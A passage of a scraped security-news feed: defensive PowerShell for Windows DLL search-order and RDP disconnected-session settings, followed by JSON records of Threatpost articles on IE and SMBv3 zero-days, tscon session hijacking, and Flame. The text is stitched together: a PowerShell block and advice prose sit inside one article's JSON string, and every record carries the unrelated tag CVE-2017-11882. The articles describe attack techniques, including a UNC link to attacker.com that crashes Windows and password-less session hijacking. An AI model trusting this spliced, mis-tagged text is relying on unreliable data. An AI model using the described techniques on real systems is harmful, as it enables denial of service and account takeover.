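$ValueName      = 'CWDIllegalInDllSearch'

# Meanings documented in KB2264107:
#   0x00000000  default: the current working directory (CWD) stays in the DLL search order
#   0x00000001  block DLL loads from the CWD only when the CWD is a WebDAV folder
#   0x00000002  block DLL loads from the CWD when the CWD is any remote folder (WebDAV or UNC)
#   0xFFFFFFFF  remove the CWD from the DLL search order entirely (the setting in the article)
# Stored as [uint32] because a bare 0xFFFFFFFF literal is parsed by PowerShell as the Int32 -1.
$Modes = @{
    Default     = [uint32]0
    BlockWebDav = [uint32]1
    BlockRemote = [uint32]2
    BlockAlways = [uint32]::MaxValue
}

function Set-CwdDllSearchPolicy {
    param(
        [ValidateSet('Default', 'BlockWebDav', 'BlockRemote', 'BlockAlways')]
        [string]$Mode = 'BlockAlways'
    )
    # The registry provider writes REG_DWORD through a signed Int32, so 0xFFFFFFFF has to be
    # handed over as its two's-complement bit pattern (-1); passing 4294967295 fails with an overflow.
    $bits = [BitConverter]::ToInt32([BitConverter]::GetBytes([uint32]$Modes[$Mode]), 0)
    New-ItemProperty -Path $SessionManager -Name $ValueName -PropertyType DWord -Value $bits -Force | Out-Null
}

function Get-CwdDllSearchPolicy {
    $item = Get-ItemProperty -Path $SessionManager -Name $ValueName -ErrorAction SilentlyContinue
    if ($null -eq $item) { return 'Default (value not present)' }
    # Turn the Int32 the provider returns back into the unsigned DWORD the KB documents
    $dword = [BitConverter]::ToUInt32([BitConverter]::GetBytes([int]$item.$ValueName), 0)
    $name  = ($Modes.GetEnumerator() | Where-Object { $_.Value -eq $dword } | Select-Object -First 1).Key
    if (-not $name) { $name = 'Unrecognised' }
    '{0} (0x{1:X8})' -f $name, $dword
}

# Apply the setting from the article, then confirm what is actually stored
Set-CwdDllSearchPolicy -Mode BlockAlways
Get-CwdDllSearchPolicy
```

Run `Get-CwdDllSearchPolicy` on its own first to record the current state before changing it. As the article warns, test with the applications that matter before rolling this out: `BlockAlways` is the setting Microsoft's steps describe, and `BlockRemote` is the fallback that still closes the WebDAV and UNC vector Ness describes while leaving local working-directory loads alone.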
\n", "cvss3": {}, "published": "2010-09-01T13:38:15", "type": "threatpost", "title": "Microsoft Publishes New FixIt Tool For DLL Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:36:11", "id": "THREATPOST:35BD4DEE5D1763F5788A6BD1F6AEB00D", "href": "https://threatpost.com/microsoft-publishes-new-fixit-tool-dll-bug-090110/74409/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:09", "description": "[](<https://threatpost.com/new-zero-day-flaw-discovered-ie7-112209/>)There is a newly discovered vulnerability in both Internet Explorer 6 and Internet Explorer 7 that could enable an attacker to take complete control of a vulnerable machine.\n\nThe vulnerability is the result of a dangling pointer in IE and there is a working exploit for the flaw circulating online. The flaw lies in the way that Internet Explorer handles CSS data. [CSS](<http://www.w3.org/Style/CSS/>) is a technology that\u2019s used in many sites to help present information in an organized manner. Specifically, the vulnerability is in the mshtml.dll, the Microsoft HTML Viewer.\n\nAccording to an [analysis by Vupen Security](<http://www.vupen.com/english/advisories/2009/3301>), an attacker could exploit the flaw either to crash a vulnerable version of IE, or to run arbitrary code on the user\u2019s machine. There is no patch available for the vulnerability. The SANS Internet Storm Center also has an analysis up.\n\nA vulnerability has been identified in Microsoft Internet Explorer, which could be exploited by attackers to compromise a vulnerable system. 
This issue is caused by a dangling pointer in the Microsoft HTML Viewer (mshtml.dll) when retrieving certain CSS/STYLE objects via the \u201cgetElementsByTagName()\u201d method, which could allow attackers to crash an affected browser or execute arbitrary code by tricking a user into visiting a malicious web page.\n\nAn [exploit for the vulnerability in IE](<http://www.securityfocus.com/archive/1/507984/30/0/threaded>) was published on the Bugtraq mailing list Friday, but experts say it is not very reliable at this point. However, the level of detail included in the Bugtraq post will likely lead to the release of a more reliable exploit soon. In lieu of a patch, users should disable JavaScript in IE to prevent exploitation.\n\nMicrosoft has not yet published any advisories on the new IE vulnerability.\n", "cvss3": {}, "published": "2009-11-22T21:47:10", "type": "threatpost", "title": "New Zero-Day Flaw Discovered in IE7", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T14:05:16", "id": "THREATPOST:7FFF8255C6708C32B41A2B0FBFEBA9B0", "href": "https://threatpost.com/new-zero-day-flaw-discovered-ie7-112209/73151/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:55", "description": "Dennis Fisher and Mike Mimoso talk about the end of the Patch Tuesday era for most Microsoft customers, the appeals court ruling on Section 215 metadata collection and Dennis\u2019s idea for a security industry commission.\n\nDownload: [digital_underground_201.mp3](<http://traffic.libsyn.com/digitalunderground/digital_underground_201.mp3>)\n\nMusic by Chris Gonsalves\n\n[](<https://itunes.apple.com/us/podcast/digital-underground-podcast/id315355232?mt=2>)\n", "cvss3": {}, "published": "2015-05-08T12:12:40", "type": "threatpost", "title": "Dennis Fisher and Mike Mimoso on the End of the Patch Tuesday Era, Section 215 and More", "bulletinFamily": "info", 
"cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-05-08T16:39:21", "id": "THREATPOST:43C7C5989C2358091F5FA33D11480AEB", "href": "https://threatpost.com/threatpost-news-wrap-may-8-2015/112705/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:47", "description": "[](<https://threatpost.com/researcher-shows-killbit-no-defense-msvidctl-flaw-072709/>)Ryan Smith, one of the researchers who found the bug in the Microsoft MsVidCtl DLL that the vendor is rushing to patch this week, has posted a [short video demonstration](<http://www.hustlelabs.com/bh2009preview/>) of a technique that bypasses the stop-gap solution of preventing the vulnerable ActiveX control from loading.\n\nIn the demo, Smith, a former researcher with IBM ISS who will be giving a talk on the exploit at the Black Hat conference later this week with Mark Dowd and David Dewey, shows that setting the killbit on the vulnerable control, as Microsoft and others suggested, is not sufficient to prevent exploitation. The demo shows Smith using a new tool called Killbit Visualizer to log the IDs of killbits that are specifically allowed or denied.\n\nHe is then able to get around the killbit protection on the vulnerable video control and cause the calculator to start on the machine.\n\nSmith\u2019s demo comes on the heels of a [blog post by Halvar Flake](<http://addxorrol.blogspot.com/2009/07/poking-around-msvidctldll.html>), a well-known security researcher, who pointed out nearly three weeks ago that simply setting the killbit was not going to protect users against the MsVidCtl flaw. From his post:\n\nSo, where does this leave us ?\n\n 1. The bug is actually much \u201cdeeper\u201d than most people realize.\n\n 2. The killbit-fix is clearly insufficient, as there are bound to be many other ways of triggering the issue.\n\n 3. 
The bug might have weaseled its way into third-party components, IF anyone outside of Microsoft had access to the broken ATL versions.\n\n 4. If this has happened, MS might have accidentally introduced security vulnerabilities into third-party products.\n\n 5. Depending on the optimization settings applied to the executables, it might require a bit of an effort to find out whether a vulnerable or non-vulnerable version of the code is present.\n\n 6. There might be a lot of recompiling next week.\n\n 7. IF this has gotten into third-party-products, I would bet that only a tiny fraction of software vendors will push out proper/timely updates.\n\nMicrosoft is rushing out an [emergency patch for the vulnerability](<https://threatpost.com/researcher-shows-killbit-no-defense-msvidctl-flaw-072709/>) on Tuesday.\n", "cvss3": {}, "published": "2009-07-27T15:29:15", "type": "threatpost", "title": "Researcher Shows Killbit is No Defense on MsVidCtl Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:45", "id": "THREATPOST:EF7DCA1CE0B1A1B1D93B4E4F7A3A3163", "href": "https://threatpost.com/researcher-shows-killbit-no-defense-msvidctl-flaw-072709/73016/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:54:08", "description": "Microsoft will not rush out an emergency patch for a zero-day vulnerability disclosed on Wednesday in the Windows implementation of the Server Message Block protocol.\n\nResearcher Laurent Gaffie announced in a tweet, below, that he\u2019d found a zero-day vulnerability in SMBv3 and released a [proof-of-concept exploit](<https://github.com/lgandx/PoC/tree/master/SMBv3%20Tree%20Connect>). He told Threatpost that he privately disclosed the issue to Microsoft on Sept. 
25 and that Microsoft told him it had a patch ready for its December patch release, but decided to wait until its scheduled February update to release several SMB patches rather than a single fix in December. Microsoft considers the vulnerability, a remotely triggered denial-of-service bug, low-risk.\n\n> SMBv3 0day, Windows 2012, 2016 affected, have fun \ud83d\ude42 Oh&if you understand this poc, bitching SDLC is appropriate \ud83d\ude42<https://t.co/xAsDOY54yl>\n> \n> \u2014 Responder (@PythonResponder) [February 1, 2017](<https://twitter.com/PythonResponder/status/826926681701113861>)\n\n\u201cWindows is the only platform with a customer commitment to investigate reported security issues, and proactively update impacted devices as soon as possible. Our standard policy is that on issues of low risk, we remediate that risk via our current Update Tuesday schedule,\u201d a Microsoft spokesperson told Threatpost in an email statement. The next scheduled Microsoft update is Feb. 14.\n\nGaffie said the vulnerability is specifically a null pointer dereference in SMB and that it affects Windows Server 2012 and 2016. He added that a joint analysis between himself and Microsoft concluded that code execution doesn\u2019t seem possible through an exploit of this vulnerability. SMB is generally not exposed to the Internet, though Gaffie said that outbound connections where clients connect to remote file servers are more likely to be allowed than inbound SMB connections over an open port 445.\n\n\u201cThis bug can be used to trigger a reboot on a given target, it can be either local (via netbios, llmnr poisoning) or remote via a UNC link (example: adding an image with a link: \\\\\\[attacker.com](<http://attacker.com/>)\\file.jpg in an email),\u201d Gaffie said. \u201cIt\u2019s important to note that this trivial bug should have been caught immediately by their SDLC process, but surprisingly it was not. 
\u201cThis means that the new code base was simply not audited or fuzzed before shipping it on their latest operating systems.\u201d\n\nGaffie also said he decided to release details prior to the availability of a patch because it\u2019s not his first experience working with Microsoft where they have delayed a patch release for one of his bugs.\n\n\u201cI decided to release this bug one week before the patch is released, because it is not the first time Microsoft sits on my bugs,\u201d he said. \u201cI\u2019m doing free work here with them (I\u2019m not paid in anyways for that) with the goal of helping their users. When they sit on a bug like this one, they\u2019re not helping their users but doing marketing damage control, and opportunistic patch release. This attitude is wrong for their users, and for the security community at large.\u201d\n\nJohannes Ullrich, dean of research at the SANS Institute and director of the SANS Internet Storm Center, said he ran Gaffie\u2019s exploit and could confirm that it caused a crash on a fully patched Windows 10 system.\n\n\u201cModern Windows versions have several protection mechanisms to prevent remote execution for exploits like this,\u201d Ullrich said. \u201cIt would likely be difficult, but not necessarily impossible.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2017/02/06230816/Screen-Shot-2017-02-02-at-1_29_33-PM.png>)\n\nUllrich published a post on the SANS ISC site describing [his testing of Gaffie\u2019s exploit](<https://isc.sans.edu/diary/Windows%2BSMBv3%2BDenial%2Bof%2BService%2BProof%2Bof%2BConcept%2B%280%2BDay%2BExploit%29/22029>). The PoC would require an attacker to send a link to a victim, luring them to connect to a malicious SMB server instance.\n\n\u201cA URL like \\\\\\\\[server ip address\\IPC$ would trigger the exploit,\u201d Ullrich said. 
\u201cI have tested it in Edge and Internet Explorer on Windows 10 with a local html file like that and it shut down the system immediately.\n\n\u201cThe exploit implements its own SMB server, so it is as easy as running the exploit, making sure the user can connect (e.g. firewall issues) and then sending the \u2018right\u2019 link to the user,\u201d Ullrich said. \u201cThis is pretty easy to exploit. Took me maybe 10 minutes to get it to work. The exploit comes without instructions.\u201d\n\nUllrich explained that the attacker will respond with a crafted Tree Connect Response\u2014Tree Connect Requests are sent to Windows servers when users connect to shares\u2014that is lengthy and also includes a \u201clong trailer.\u201d He explained in the SANS ISC post that the tree connect response message consists of a NetBIOS header and message type of a total length of 1580 bytes, and an SMB2 header that is 64 bytes long. The Tree Connect Response message has a fixed length of 8 bytes in addition to the fixed header.\n\n\u201cThis is where the message should end. But apparently, since the total message size according to the NetBIOS header is larger, Windows keeps on decoding in the crafted header (all \u2018C\u2019s\u2019 in the exploit), which then triggers the buffer overflow,\u201d Ullrich said.\n", "cvss3": {}, "published": "2017-02-03T08:36:13", "type": "threatpost", "title": "Microsoft Waits for Patch Tuesday to Fix SMB Zero Day", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2017-02-03T19:56:30", "id": "THREATPOST:3D7F98274EE0CEFF5B22DA72598BE24B", "href": "https://threatpost.com/microsoft-waits-for-patch-tuesday-to-fix-smb-zero-day/123541/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:25", "description": "Microsoft has pulled a recent patch for Outlook 2007 after it caused slow performance and problems with third-party e-mail services. 
Microsoft withdrew a software update [released last week](<https://threatpost.com/microsoft-closes-door-stuxnet-december-patch-121410/>) after reports that the update, to its Outlook 2007 e-mail product, was causing problems for customers connecting to third-party e-mail products. \n\nThe company has withdrawn the update [KB2412171](<http://support.microsoft.com/kb/2412171>) from its Microsoft Update service, [according to a blog post](<http://blogs.msdn.com/b/outlook/archive/2010/12/17/issues-with-the-recent-update-for-outlook-2007.aspx>). Microsoft recommends that customers who have installed it and encountered problems uninstall the patch.\n\nUsers began reporting problems with the Outlook 2007 update soon after it was released on December 14. Among other things, customers reported severe slowdowns in the Outlook 2007 application when moving between mail folders or clicking on Calendar or Task links. \n\nCustomers who used Outlook to send and receive messages from e-mail servers that were not running Microsoft\u2019s Exchange e-mail server software, including Gmail and Windows Live Hotmail, were among those affected. In addition, the update prevented Gmail users from connecting to Gmail\u2019s mail servers if the Outlook Secure Password Authentication (SPA) option was enabled, and broke Auto Archiving for IMAP, POP3 and Outlook Live Connector accounts that were managed using Outlook, if no Exchange Server account was configured in the same Outlook profile, Microsoft said. \n\nMicrosoft apologized for the disruption and has provided instructions for removing the update while the company investigates the performance issues. 
\n", "cvss3": {}, "published": "2010-12-21T17:21:16", "type": "threatpost", "title": "Microsoft Withdraws Outlook Update After Gmail Conflicts", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:35:28", "id": "THREATPOST:AFCEAC73B5337D8E7C237914CF84FC01", "href": "https://threatpost.com/microsoft-withdraws-outlook-update-after-gmail-conflicts-122110/74796/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:56", "description": "A researcher has exposed how attackers with local admin privileges could use native command-line Windows tools to hijack other users\u2019 sessions without credentials.\n\nResearcher Alexander Korznikov on Friday published a [report](<http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html>) in which he describes how he could, locally and remotely via Remote Desktop Protocol (RDP), access other users\u2019 sessions\u2014even sessions that have been disconnected for some time\u2014with one command.\n\nKorznikov said an attacker could access domain admin sessions, read documents, and access systems, cloud domains or applications (email, Notepad, others) that the user has previously logged in to. He said he tested his attack on Windows 2012 and Windows 2008 servers, as well as Windows 10 and Windows 7 and all that is required is the NT AUTHORITY/SYSTEM command line, or to create a service that will connect a session back to the attacker\u2019s.\n\n\u201cSomeone can say, \u2018If you are admin, you can dump a server\u2019s memory and parse it.\u2019 That\u2019s correct, but you don\u2019t need it any more,\u201d Korznikov told Threatpost. \u201cJust two simple commands and you are in. The most incredible thing is that I don\u2019t need to know the credentials of the hijacked user. 
It is pure password-less hijacking.\u201d\n\nhttps://www.youtube.com/watch?v=oPk5off3yUg\n\nhttps://www.youtube.com/watch?v=VytjV2kPwSg\n\nResearcher Kevin Beaumont, meanwhile, published a [separate report](<https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6#.tlqebcmqe>) essentially confirming Korznikov\u2019s work, adding that by running the tscon.exe command as the SYSTEM user, an attacker could also connect to any session without a password.\n\n\u201cIt doesn\u2019t prompt, it just connects you to the user\u2019s desktop. I believe this is due to the way session shadowing was implemented in Microsoft Windows, and it runs throughout the years like this,\u201d Beaumont wrote.\n\nBeaumont said that his and Korznikov\u2019s research could bypass the work required to dump server memory and parse for passwords; this provides instant access to the target\u2019s desktop without leaving artifacts in a log or needing to use external tools such as Metasploit.\n\n\u201cThis isn\u2019t about SYSTEM \u2014 this is about what you can do with it very quickly, and quietly. Attackers aren\u2019t interested in playing, they\u2019re interested in what they can do with techniques. This is a very valid technique,\u201d Beaumont wrote. \u201cSo, you have full blown RDP session hijacking, with a single command.\u201d\n\nKorznikov said he confirmed with Benjamin Delpy, who six years ago disclosed [similar findings](<http://blog.gentilkiwi.com/securite/vol-de-session-rdp>), that this was a Windows feature and not a vulnerability, but that does not discount the attack value of the situation, he said. 
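A defensive counterpart to the tscon technique described above, as an added example that is not Korznikov's, Beaumont's or Microsoft's code: the hijack needs a session that is still alive on the host, and the disconnected sessions Korznikov singles out are the ones nobody is watching. The script lists the sessions quser reports as Disc and writes the Terminal Services policy that logs disconnected sessions off after a time limit. The registry value names (MaxDisconnectionTime, fResetBroken) are the ones the Session Time Limits policy template writes and are assumed here, as is the English quser column layout the parser expects.

```powershell
#Requires -RunAsAdministrator
# Added example: shrink the window for password-less session hijacking by not leaving
# disconnected sessions alive on the host. Not code from the researchers or from Microsoft.

function Get-DisconnectedSession {
    # quser prints a header row, then one row per session:
    #   USERNAME  SESSIONNAME  ID  STATE  IDLE TIME  LOGON TIME
    # A disconnected session has an empty SESSIONNAME, so splitting on runs of two or more
    # spaces yields five fields instead of six. The caller's own session is prefixed with ">".
    # Column layout assumed from quser's English output.
    $rows = @(quser 2>$null | Select-Object -Skip 1)
    foreach ($row in $rows) {
        $f = ($row -replace '^>', ' ').Trim() -split '\s{2,}'
        if ($f.Count -eq 5)     { $user, $id, $state, $idle, $logon = $f }
        elseif ($f.Count -ge 6) { $user, $sess, $id, $state, $idle, $logon = $f }
        else                    { continue }
        if ($state -eq 'Disc') {
            [pscustomobject]@{ User = $user; SessionId = [int]$id; IdleTime = $idle; LogonTime = $logon }
        }
    }
}

function Set-DisconnectedSessionLimit {
    param([ValidateRange(1, 1440)][int]$Minutes = 15)
    # Policy key behind "Set time limit for disconnected sessions" and "End session when time
    # limits are reached" (Remote Desktop Session Host > Session Time Limits); names assumed.
    $pol = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services'
    if (-not (Test-Path $pol)) { New-Item -Path $pol -Force | Out-Null }
    # MaxDisconnectionTime is expressed in milliseconds
    New-ItemProperty -Path $pol -Name MaxDisconnectionTime -PropertyType DWord -Value ($Minutes * 60000) -Force | Out-Null
    # fResetBroken = 1: log the session off when the limit is reached instead of keeping it disconnected
    New-ItemProperty -Path $pol -Name fResetBroken -PropertyType DWord -Value 1 -Force | Out-Null
}

# First see what an attacker who reaches SYSTEM on this host could attach to right now
$lingering = Get-DisconnectedSession
$lingering | Format-Table -AutoSize

# Then stop future disconnected sessions from lingering
Set-DisconnectedSessionLimit -Minutes 15

# Sessions already disconnected are not covered by the new limit; ending them is
# disruptive (unsaved work in those sessions is lost), so it is left as an explicit step:
# foreach ($s in $lingering) { logoff $s.SessionId }
```

This only narrows the exposure Korznikov describes; it does not close it. An attacker running as SYSTEM can still use tscon against a session that is active, and Delpy's and Korznikov's point stands that the real boundary is who gets local admin in the first place. Treat the time limit as hygiene for jump hosts and terminal servers, and keep the effort on preventing the privilege escalation that precedes the hijack.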
Microsoft, for its part, is unlikely to patch this.\n\n\u201cThe issue described in the report is not a security vulnerability as it requires local administrator rights on the machine,\u201d a Microsoft spokesperson told Threatpost.\n\nKorznikov said he did not disclose his findings to Microsoft prior to publication of his report last week because it was a design flaw issue, out of scope for its bug bounties, and that he did not want to wait \u201csix months until resolution for a CVE.\u201d\n\n\u201cIf you are admin, you can do everything. But here is the point: why and how you become admin? If some unprivileged user becomes admin using some kind of local privilege escalation, that\u2019s the problem\u2014and not the design flaw\u2014we are talking about,\u201d Korznikov said. \u201cYou can do everything, even patch terminal services in a way that it will accept your token and allow shadowing mode, without a user\u2019s knowledge.\u201d\n", "cvss3": {}, "published": "2017-03-20T14:50:07", "type": "threatpost", "title": "Local Windows Admins Can Hijack Sessions Without Credentials", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2017-03-22T21:45:56", "id": "THREATPOST:1C5C89106D8897D6CDDFF572948A779A", "href": "https://threatpost.com/local-windows-admins-can-hijack-sessions-without-credentials/124427/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:00", "description": "[](<https://threatpost.com/ten-years-after-gatess-memo-effects-still-being-felt-011212/>)Ten years.\n\nThat\u2019s a really long time. Think about what you were doing 10 years ago. Can you even remember? Maybe you were in college or high school, or cripes, even grade school. Or maybe you were working in security already, trying to figure out why your network kept getting overrun by viruses and attackers. 
\nYou know what Microsoft was doing 10 years ago?\n\nMaking really, really buggy software and watching its customers get owned left and right.\n\nThe early part of the 2000s was not a good time for the folks in Redmond. The company was taking a serious public beating for the instability and insecurity of its software, especially Internet Explorer, Outlook and Windows. VB script viruses such as I Love You, Melissa and others were running wild and large enterprise customers were screaming and pounding their shoes on the table and demanding answers from Microsoft.\n\nAnd Microsoft didn\u2019t have any.\n\nThe company had spent the last few years defending itself against the [Department of Justice\u2019s antitrust suit](<https://en.wikipedia.org/wiki/United_States_v._Microsoft>) centered on its Windows-IE monopoly. Much of its energy and resources\u2013not to mention money\u2013were devoted to the case, which Microsoft ultimately lost. Then, when the dust settled and company officials began looking around to see what had been going on while they were buried in federal courtrooms for three years, what they found was something like the information age version of the angry mob of villagers with torches and pitchforks.\n\nTo say that customers were not happy would be like saying Bill Gates has some money tucked away.\n\nAs it turned out, it was Gates himself who would provide the spark that would ultimately light a fire under the thousands of developers, product managers and engineers in Redmond to make security not just a priority, but the priority.\n\nThe email that Gates sent on Jan. 15, 2002, has come to be known as the [Trustworthy Computing memo](<https://threatpost.com/what-if-bill-gates-never-wrote-trustworthy-computing-memo-022410/>) and it is often pointed to as the origin of any sort of security awareness at Microsoft. But that\u2019s not really the case. 
[Gates\u2019s email](<http://www.computerbytesman.com/security/billsmemo.htm>) may have been the first real public expression of that sentiment, but some people inside the company had been thinking along those lines for some time.\n\nThe first step is admitting you have a problem, of course. But then you have to do something about it.\n\nA few months before Gates sent his email, Microsoft held a small conference in Redmond on what it then called trusted computing, bringing in a series of software security experts to discuss the principles and concepts that are the foundation of building more secure software. There were a few reporters there and some security researchers, and the fascinating thing about it was that it was not Microsoft officials preaching their ideas to the audience, but trying to learn from the assembled experts. Odd.\n\nAnd well before Gates pushed the button on his email, there were people inside the company talking about the same concepts\u2013reliability, robustness and resistance to attack\u2013and advocating that developers build their applications around them.\n\nIn the months following the publication of Gates\u2019s email, Microsoft began a number of painful internal changes designed to refocus its developers around the idea of building secure software. Until then, the ship-or-die mentality had reigned supreme inside the company and features and functionality were the two-headed god that every developer worshipped. The chances of a team stopping shipment because of a security problem at that point were zero point zero zero.\n\nBut within a few months of Gates\u2019s memo, that\u2019s exactly what happened. The company stopped development on several major products in order to put their developers through security training. 
Since then, the company has developed and released a slew of software security tools and methodologies and somehow turned Microsoft from the butt of every joke in the industry into an organization that\u2019s seen as doing it the right way.\n\nBut it wasn\u2019t just Microsoft that began changing in those days. The turnaround initiated by the company and Gates also took hold in the wider software industry and other industries, albeit much more slowly and spottily. After Microsoft\u2019s public declaration of the need for change, the sentiment began to spread to some of its larger customers. Then, more and more financial services firms, insurance companies, telecoms and other companies got on board, starting their own software security programs.\n\nBy the middle to latter part of the decade, Microsoft not only wasn\u2019t the object of every joke in the security community, it was being used as an example of how to do things right, how to get your collective stuff together and fix what\u2019s broken.\n\nSo, what Gates\u2019s memo turned out to be was not just a directive for Microsoft developers, but a call to arms for the rest of the industry, as well. It was by no means the beginning of the software security movement. Not even close. 
But it was, in fact, the beginning of something different and perhaps more important: widespread acceptance that software security needed to be a top priority.\n\nEven for Microsoft.\n\n*Microsoft homepage image via [SeattleClouds.com](<http://www.flickr.com/photos/42106306@N00/>)\u2018s Flickr photostream\n", "cvss3": {}, "published": "2012-01-12T14:43:00", "type": "threatpost", "title": "Ten Years After Gates's Memo, Effects Still Being Felt", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:00", "id": "THREATPOST:F158248C80174DD4B29AE26B4B4139C0", "href": "https://threatpost.com/ten-years-after-gatess-memo-effects-still-being-felt-011212/76089/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:58", "description": "Mike Mimoso talks to Cody Pierce, director of vulnerability research and prevention with Endgame, at RSA Conference 2017 about how attackers are changing their techniques in the face of mitigations and continuing to base exploits around legitimate APIs and functions to thwart detection.\n\n[](<https://itunes.apple.com/us/podcast/the-threatpost-podcast/id315355232?mt=2>)[](<https://threatpost.com/category/podcasts/feed/>)\n\nDownload: [Cody_Pierce_on_Exploit_Development.mp3](<http://traffic.libsyn.com/digitalunderground/Cody_Pierce_on_Exploit_Development.mp3>)\n\nMusic by Chris Gonsalves\n", "cvss3": {}, "published": "2017-03-13T10:27:18", "type": "threatpost", "title": "Cody Pierce on the Future of Exploit Development", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2017-03-16T18:24:34", "id": "THREATPOST:AD96628DA2614402CC9BDEF93704870B", "href": "https://threatpost.com/cody-pierce-on-exploit-development/124249/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:53", "description": "The attackers 
behind Flame can easily clean up compromised computers, according to research by security firm Symantec, which found that some attackers have been able to use command-and-control (C&C) servers to completely remove the malware from certain machines.\n\nAccording to a post on [Symantec\u2019s Security Response blog](<https://threatpost.com/attackers-can-use-self-destruct-feature-kill-flame-060812/>) yesterday, C&C servers can send a file to infected computers to \u201cuninstall\u201d the Flame malware. The file, Browse32.ocx, then searches the infected computer for every file used by Flame, removes them and even overwrites the disk with random bits of information and characters to cover its tracks.\n\nAccording to Symantec\u2019s analysis, the module contains two different exports: EnableBrowser, which initializes the module, and StartBrowse, which does the actual deletion of the Flame files. Symantec also adds that the module appears to have been created on May 9 and looks similar to SUICIDE, an older module previously found in Flame\u2019s code.\n\nFlame was discovered in recent months and [disclosed by the Iranian government and western firms last week](<https://threatpost.com/whats-meaning-flame-malware-052912/>). The worm quickly drew comparisons to Stuxnet and Duqu. 
While the malware has apparently existed for years, it wasn\u2019t until this week that it was revealed the attackers [used a collision attack](<https://threatpost.com/microsoft-details-flame-hash-collision-attack-060612/>) to get the malware to [exploit a fraudulent certificate](<https://threatpost.com/flame-malware-uses-forged-microsoft-certificate-validate-components-060412/>) from Microsoft to attack Windows systems.\n", "cvss3": {}, "published": "2012-06-08T17:32:37", "type": "threatpost", "title": "Attackers Can Use 'Self-Destruct' Feature to Kill Flame", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:05", "id": "THREATPOST:6E2DD8B76555337B1AB3A01AE147EA68", "href": "https://threatpost.com/attackers-can-use-self-destruct-feature-kill-flame-060812/76669/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:06", "description": "[](<https://threatpost.com/microsoft-submits-tracking-protection-proposal-w3c-022511/>)Microsoft has submitted its proposal for web tracking protection to the W3C for consideration as a standard, hoping to get the organization\u2019s stamp of approval for its browser privacy technology. The proposal is in the earliest stages of the process and has not been approved, a process that can take years in some cases.\n\n[Microsoft\u2019s proposal for Web Tracking Protection](<http://www.w3.org/Submission/2011/SUBM-web-tracking-protection-20110224/>) is one of a number of similar ideas and methods that are floating around right now among technology companies, regulators and law makers. Mozilla has developed its own technology and [Google also is working on a permanent opt-out mechanism](<https://threatpost.com/google-releases-permanent-opt-out-extension-chrome-012411/>) for enabling users to prevent sites from tracking their movements with cookies. 
Much of the activity in this arena has popped up in the months since federal lawmakers began discussing the idea of a Do Not Track system for Internet users last year.\n\nMicrosoft has implemented a version of its Web Tracking Protection mechanism in the [release candidate for Internet Explorer 9](<https://threatpost.com/microsoft-releases-ie9-release-candidate-tracking-protection-021111/>), which the company released earlier this month. The company\u2019s proposal relies on the concept of filter lists, which Web site owners can publish and which IE9, and presumably other browsers, can consume and parse. The lists comprise \u201cparts of [third-party URIs](<http://www.w3.org/Submission/2011/SUBM-web-tracking-protection-20110224/#dfn-third-party-uri> \"third party uri\" ) that a browser may access automatically when referenced within a web page a user deliberately visits. Rules in a [filter list](<http://www.w3.org/Submission/2011/SUBM-web-tracking-protection-20110224/#dfn-filter-list>) may change the way the user agent handles [third-party](<http://www.w3.org/Submission/2011/SUBM-web-tracking-protection-20110224/#dfn-third-party-uri> \"third party uri\" ) content. By limiting the calls to these websites and blocking resources from other web pages, the [filter list](<http://www.w3.org/Submission/2011/SUBM-web-tracking-protection-20110224/#dfn-filter-list>) limits the information other sites can collect about a user,\u201d Microsoft said in its proposal to the W3C.\n\nIn most cases, technologies such as Tracking Protection are being discussed and thought of in the context of blocking cookies and other methods that sites use to see what other sites their visitors have been to or where they came from. 